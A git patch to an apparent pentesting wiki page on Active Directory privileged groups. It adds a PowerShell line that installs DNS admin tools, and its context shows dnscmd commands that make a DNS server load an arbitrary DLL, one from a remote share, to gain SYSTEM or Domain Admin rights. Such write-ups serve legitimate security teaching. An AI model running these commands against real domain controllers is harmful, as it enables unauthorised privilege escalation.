From 6a259d2d385c11a7cf892544e88cf89fd4ee7a74 Mon Sep 17 00:00:00 2001
From: carlospolop <carlospolop@gmail.com>
Date: Tue, 22 Jul 2025 13:17:59 +0200
Subject: [PATCH] f

---
 .../privileged-groups-and-token-privileges.md                  | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
index 596ebd40a..0d7237d26 100644
--- a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
+++ b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
@@ -172,6 +172,9 @@ Members can make the DNS server load an arbitrary DLL (either locally or from a
 dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
 dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
 An attacker could modify the DLL to add a user to the Domain Admins group or execute other commands with SYSTEM privileges. Example DLL modification and msfvenom usage:
+
+# If dnscmd is not installed run from aprivileged PowerShell session:
+Install-WindowsFeature -Name RSAT-DNS-Server -IncludeManagementTools
 ```
 
 ```c